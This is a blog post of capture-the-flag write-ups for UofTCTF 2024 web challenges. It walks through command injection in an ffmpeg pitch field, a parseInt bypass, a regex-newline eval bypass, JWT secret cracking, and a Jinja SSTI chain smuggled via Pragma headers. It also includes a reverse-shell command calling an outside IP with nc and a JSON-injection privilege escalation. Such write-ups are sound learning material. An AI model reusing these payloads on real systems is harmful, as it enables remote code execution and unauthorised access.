---
layout: post
title: UofTCTF 2024 Web Challenges
author: m0z
categories: [Jeopardy]
tags: [ctf,web]
---

# Writeups

## web/Voice Changer
Sourceless web challenge.

Just a file upload with a pitch option. I intercepted the HTTP request and modified the pitch value.

```http
POST /upload HTTP/1.1

------WebKitFormBoundaryHis6nSAKTnz412sw
Content-Disposition: form-data; name="pitch"

randomness
------WebKitFormBoundaryHis6nSAKTnz412sw
Content-Disposition: form-data; name="input-file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryHis6nSAKTnz412sw--
```

The "randomness" value is reflected in our output from a ffmpeg command. I tried command injection and noticed shell errors were being printed.

I managed to get a reverse shell by passing `a" ||nc 54.174.18.49 3000 -e sh;` and found the flag located at `/secret.txt` location.

`uoftctf{Y0UR Pitch IS 70O H!9H}`

## web/The Varsity
We have a javascript app with source this time. We can identify that the flag is located in the article array as part of the last element:

```js
const articles = [
  {
    "title": "Pioneering the Future: UofT's Revolutionary AI Research",
    "content": "The University of Toronto continues to lead groundbreaking research in artificial intelligence, with its latest project aiming to develop algorithms that can understand emotions in text. Spearheaded by a team of international students, this initiative promises to revolutionize how machines interact with human language."
  },
  ...
  {
    title: "UofT Hosts its 2nd Inaugural Capture the Flag Event",
    content: "Your flag is: " + FLAG,
  },
];
```

So we just need to read the article which contains this flag. I notice when trying to read this article I get blocked by the following line:

```js
if (decoded.subscription !== "premium" && issue >= 9) {
        return res
          .status(403)
          .json({ message: "Please subscribe to access this issue" });
      }
```

This is because it has `id` of 9. We need to pass in a value which is NOT `>= 9` but will read the final element of the array when it hits the following line:

```js
return res.json(articles[issue]);
```

My initial thought was to pass in `-1` because in Python that can be used to access the last element of a list. Then I remembered that unfortunately this was written in Javascript!

But one line peaked my interest which sat after the numerical check but before the return:

```js
issue = parseInt(issue);
```

Can we pass a value which is considered NOT `>= 9` but when passed into `parseInt()` returns 9? Well, it turns out that any letters appended to javascript's `parseInt()` are truncated.

```http
POST /article HTTP/1.1

{"issue":"9a"}
```

And we get our flag.

`uoftctf{w31rd_b3h4v10r_0f_parseInt()!}`

## web/No Code
This time we just get a standalone Python source file. We can see the application is running Flask and there is only one endpoint to interact with.

```python
@app.route('/execute', methods=['POST'])
def execute_code():
    code = request.form.get('code', '')
    if re.match(".*[\x20-\x7E]+.*", code):
        return jsonify({"output": "jk lmao no code"}), 403
    result = ""
    try:
        result = eval(code)
    except Exception as e:
        result = str(e)

    return jsonify({"output": result}), 200
```

Okay, so we obviously need to find a way to hit the eval and execute our code. At first, I assumed this was a PyJail challenge but since it was extremely strict I started to think there had to be a means to bypass the regex check.

Then I recalled that `re.match()` only matches the first line. So, by passing in a newline first we can inject our payload to be eval'd afterwards.

```http
POST /execute HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

code=%0aopen('flag.txt').read()
```

Don't forget your Content-Type header when creating the request! I ended up just using the open call and guessing the flag name instead of any fancy RCE approaches.

`uoftctf{r3g3x_3p1c_f41L_XDDD}`

## web/Guestbook

Someone else on the team solved this so they can write it up.

## web/My First App

No source for this challenge.

With the only option being to set a username it seemed obvious this would have to be some sort of injection attack. I tried immediately sending a SSTI payload but was blocked by a client-side pattern match. I removed the client-side check and sent the payload but was greeted with the error `Username must be alphanumeric.` which seems pretty strict.

Without much else to go on, I checked the cookies and noticed it was JWT. I ran jwt_tool on this but got nothing. I also tried cracking the secret key with a basic wordlist to no avail.

So I decided to load my JWT `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IlVTRVIifQ.01eSew74pkzoX1XDBW1l4AuU1Lw_VV59WDc86GY_mCc` into Hashcat and run rockyou.txt on it.

This recovered the JWT secret key `torontobluejays` pretty fast.

Next I decided to sign a username containing a SSTI payload {% raw %}`{{7*7}}`{% endraw %} and got the elusive `49`. I immediately threw in a payload and hit the filter.

They seemed to be blocking a lot of different things. The most important things was figuring out which *characters* are blocked. Firstly, there are no square brackets which means we need to use dot notation to access most attributes. We also have no underscores which means we cannot use strings such as `__globals__` or `__class__` and so on. In fact, we don't even have quotations to instantiate strings.

I initially found a way to sneak in strings via parameters but passing any parameters at all hits an entirely separate block. I also found a way to sneak in parameters via POST form parameters but sending a POST request would not hit the Flask endpoint logic. I settled on finding a suitable HTTP header to sneak strings through.

The header could not contain an underscore though and so the most suitable seemed to be Pragma. If we send duplicate pragma headers then it becomes an array and we can access the offsets using dot notation `request.pragma.0` so I settled on using the following lipsum payload:

{% raw %}
```python
{{lipsum|attr("__globals__")|attr("__getitem__")|attr("__builtins__")|attr("__import__")|attr("os")|attr("popen")|attr("cat flag.txt")|attr("read")()}}
```
{% endraw %}

Which when replaced with our pragma headers becomes:

{% raw %}
```python
{{lipsum|attr(request.pragma.0)|attr(request.pragma.1)(request.pragma.2)|attr(request.pragma.1)(request.pragma.3)(request.pragma.4)|attr(request.pragma.5)(request.pragma.6)|attr(request.pragma.7)()}}
```
{% endraw %}

And our HTTP headers will include:

```http
Pragma: __globals__
Pragma: __getitem__
Pragma: __builtins__
Pragma: __import__
Pragma: os
Pragma: popen
Pragma: cat flag.txt
Pragma: read
```

And that got us the second solve on this challenge!

`uoftctf{That_firewall_salesperson_scammed_me_:(}`

## web/Jay's Bank

So we are given a javascript source with a mysql database. Firstly, we should check the routes and aside from the typical login/register we have a /profile PUT endpoint which allows us to modify our user account.

```javascript
await db.updateData(
      username,
      db.convert({
        phone,
        credit_card,
        secret_question,
        secret_answer,
        role: "user",
      })
    );
```

It will then update our data in the database. Notice that inside of the call to `db.updateData()` there is a call to `db.convert()` so let's pull up the source for that:

```js
convert(o) {
    console.log(`{${Object.entries(o).map(([k, v]) => 
      `"${k}": ${typeof v === "object" && v !== null ? convert(v) : `"${v}"`}`
    ).join(", ")}}`.toLowerCase());
    return `{${Object.entries(o).map(([k, v]) => 
      `"${k}": ${typeof v === "object" && v !== null ? convert(v) : `"${v}"`}`
    ).join(", ")}}`.toLowerCase();
  }
```

Immediately I guessed this would be prototype pollution as it is a javascript application (where such attacks are common) and we are seeing some references to `Object` but after further checks I didn't really see any potential to overwrite that. Let's just analyze what this method does.

It takes an object `o` and recursively creates a string representation of this object. Normally I would expect just a call to `JSON.stringify` so this looked very suspicious. I noticed that if a value contains a quotation (`"`) then it will break out of the value and allow us to add additional parameters. Normally, a call to update our profile with a `secret_answer` set to `abc` will result in the following object being saved:

```json
{"phone": "1111111111", "credit_card": "1111111111111111", "secret_question": "aaa", "secret_answer": "abc", "role": "user"}
```

But if we instead set our `secret_answer`to `abc", "role": "admin` then it will become:

```json
{"phone": "1111111111", "credit_card": "1111111111111111", "secret_question": "aaa", "secret_answer": "a", "role": "admin", "role": "user"}
```

This however, will not work because `JSON.parse()` will take the last value of role to be true, so it will overwrite our injected `"role": "admin"` value.

We can bypass this though by looking at the database specification.

```sql
CREATE TABLE users (
    id INT NOT NULL AUTO_INCREMENT,
    username NVARCHAR(255) NOT NULL,
    password NVARCHAR(255) NOT NULL,
    data NVARCHAR(255) NOT NULL,
    PRIMARY KEY (id)
);
```

Notice that the field we are storing to (`data`) is maximum length of 255. If we have data greater in length than this, then it will be truncated and we can slice off the part which defines our role as user! Unfortunately, there are length checks on `phone` (must be 10) and `credit_card` (must be 16) and these both must be numbers so we can't do much there. Under `secret_question` and `secret_answer` we are also limited to just 45 each. In total, that is around 150 characters when including all the curly braces and quotation.

You will however, notice that there is a call to `String.toLowerCase()` on the convert function. This is great, because there is one single character in javascript (`İ`) which has a length of 1 but after passing through the `String.toLowerCase()` function its length becomes 2.

So we `PUT /profile` with the following payload:

```json
{
    "phone":"1111111111",
    "credit_card":"1111111111111111",
    "secret_question":"İİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİ",
    "secret_answer":"İİİİİİİİİİİİİİİİİİİİİİİİ\",\"role\":\"admin\"}",
    "current_password":";)"}
```

And we log back in and fetch out flag! Hope you enjoyed the writeups.
